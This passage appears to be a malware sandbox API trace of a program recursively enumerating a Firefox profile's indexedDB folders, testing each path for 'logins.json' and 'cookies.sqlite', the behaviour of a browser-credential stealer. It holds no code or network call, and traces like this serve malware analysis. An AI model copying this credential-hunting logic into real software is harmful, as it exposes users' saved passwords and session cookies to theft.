lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0160.831] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2df720, dwLength=0x1c | out: lpBuffer=0x2df720*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x22000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.831] GetProcessHeap () returned 0x8e0000 [0160.831] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0160.831] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0160.831] lstrlenW (lpString="") returned 0 [0160.831] GetProcessHeap () returned 0x8e0000 [0160.831] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x924da0 [0160.831] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0160.831] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0160.831] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0160.831] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0160.831] lstrlenW (lpString="\\*.*") returned 4 [0160.831] GetProcessHeap () returned 0x8e0000 [0160.831] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0160.831] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0160.831] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*.*" [0160.831] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*.*", lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9a80 [0160.833] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0160.833] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.833] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0160.833] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0160.833] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df500 | out: lpFindFileData=0x2df500*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="moz-safe-about+home", cAlternateFileName="MOZ-SA~1")) returned 1 [0160.833] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0160.833] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0160.833] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0160.833] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0160.833] lstrlenW (lpString="\\") returned 1 [0160.833] GetProcessHeap () returned 0x8e0000 [0160.833] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc6) returned 0x924e70 [0160.833] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0160.833] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0160.833] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0160.833] lstrlenW (lpString="moz-safe-about+home") returned 19 [0160.833] GetProcessHeap () returned 0x8e0000 [0160.833] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xec) returned 0x9252c0 [0160.833] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0160.834] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpString2="moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0160.834] VirtualQuery (in: lpAddress=0x924e70, lpBuffer=0x2df4a8, dwLength=0x1c | out: lpBuffer=0x2df4a8*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.834] GetProcessHeap () returned 0x8e0000 [0160.834] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924e70 | out: hHeap=0x8e0000) returned 1 [0160.834] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0160.834] lstrlenW (lpString="") returned 0 [0160.834] GetProcessHeap () returned 0x8e0000 [0160.834] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xec) returned 0x924e70 [0160.834] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0160.834] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0160.834] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0160.834] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0160.834] lstrlenW (lpString="\\*.*") returned 4 [0160.834] GetProcessHeap () returned 0x8e0000 [0160.834] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x9253b8 [0160.834] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0160.834] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*.*" [0160.834] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*.*", lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0160.834] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0160.834] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName="..", cAlternateFileName="")) returned 1 [0160.834] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0160.834] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0160.834] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName=".metadata", cAlternateFileName="METADA~1")) returned 1 [0160.834] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0160.834] lstrlenW (lpString="\\") returned 1 [0160.834] GetProcessHeap () returned 0x8e0000 [0160.835] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xee) returned 0x9254b8 [0160.835] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0160.835] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0160.835] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0160.835] lstrlenW (lpString=".metadata") returned 9 [0160.835] GetProcessHeap () returned 0x8e0000 [0160.835] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x100) returned 0x9255b0 [0160.835] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0160.835] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2=".metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" [0160.835] VirtualQuery (in: lpAddress=0x9254b8, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.835] GetProcessHeap () returned 0x8e0000 [0160.835] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254b8 | out: hHeap=0x8e0000) returned 1 [0160.835] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata", lpSrch="logins.json") returned 0x0 [0160.835] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata", lpSrch="cookies.sqlite") returned 0x0 [0160.835] VirtualQuery (in: lpAddress=0x9255b0, lpBuffer=0x2df23c, dwLength=0x1c | out: lpBuffer=0x2df23c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.835] GetProcessHeap () returned 0x8e0000 [0160.835] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9255b0 | out: hHeap=0x8e0000) returned 1 [0160.835] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df288 | out: lpFindFileData=0x2df288*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8e0000, dwReserved1=0x8e0150, cFileName="idb", cAlternateFileName="")) returned 1 [0160.835] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0160.835] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0160.835] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0160.835] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0160.835] lstrlenW (lpString="\\") returned 1 [0160.835] GetProcessHeap () returned 0x8e0000 [0160.835] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xee) returned 0x9254b8 [0160.835] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0160.835] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0160.835] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0160.836] lstrlenW (lpString="idb") returned 3 [0160.836] GetProcessHeap () returned 0x8e0000 [0160.836] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x9255b0 [0160.836] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0160.836] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2="idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0160.836] VirtualQuery (in: lpAddress=0x9254b8, lpBuffer=0x2df230, dwLength=0x1c | out: lpBuffer=0x2df230*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.836] GetProcessHeap () returned 0x8e0000 [0160.836] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254b8 | out: hHeap=0x8e0000) returned 1 [0160.836] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0160.836] lstrlenW (lpString="") returned 0 [0160.836] GetProcessHeap () returned 0x8e0000 [0160.836] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x9256b0 [0160.836] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0160.836] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0160.836] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0160.836] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0160.836] lstrlenW (lpString="\\*.*") returned 4 [0160.836] GetProcessHeap () returned 0x8e0000 [0160.836] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfc) returned 0x9257b0 [0160.836] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0160.836] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*.*" [0160.836] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*.*", lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0160.839] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0160.839] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df010 | out: lpFindFileData=0x2df010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 